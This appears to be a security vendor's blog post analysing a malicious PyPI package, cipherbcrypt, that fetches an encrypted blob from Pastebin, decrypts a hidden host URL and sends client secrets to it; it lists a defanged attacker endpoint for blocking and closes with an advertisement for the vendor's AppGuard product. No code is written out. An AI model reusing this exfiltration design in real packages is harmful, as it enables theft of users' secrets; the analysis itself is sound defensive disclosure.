Analysis Of Malicious Python Package cipherbcrypt

Posted by Gauss Security Labs on Jul 17, 2024 17/06/2024

Article Page

A malicious package was found on pypi.

Upon visiting the page of the package, we can see it is quite a popular package

Package Page On Pypi
Package Page On Pypi

After downloading and investigating the source code, we found the following:

Key Findings

  • Connection to Pastebin: The package connects to a Pastebin snippet to obtain an encrypted data blob. This use of a benign platform helps avoid detection.
  • Decryption: The encrypted blob is decrypted to reveal the malicious host URL.
  • Data Exfiltration: The package sends secrets to the malicious host URL
Encrypted Blob
Encrypted Blob

The package provides 2 functions for encryption and decryption.

The third function is a malicious function that sends client secrets to remote host

Below is the full detailed analysis of the obfuscated source code

Deobfuscated Source Code with comments
Deobfuscated Source Code with comments

We can see that the malicious package is sending secrets to the following server:

hxxps://decry.in:2096/check

Make sure to block any interactions with it.

Securing Third-Party Software: Safeguarding with AppGuard

Ensuring the safety of your third-party software libraries is crucial in defending against malicious packages.

Our solution is called AppGuard, which was developed by our Elite R&D team (35 Elite cyber security professionals, including former members of the IDF 8200 unit)

AppGuard provides robust security measures to verify and monitor these libraries, ensuring they are free from vulnerabilities and malicious code. This proactive approach helps maintain the integrity of your software environment and protects against potential threats.

For more information on AppGuard capabilities and how to stay protected, contact us here.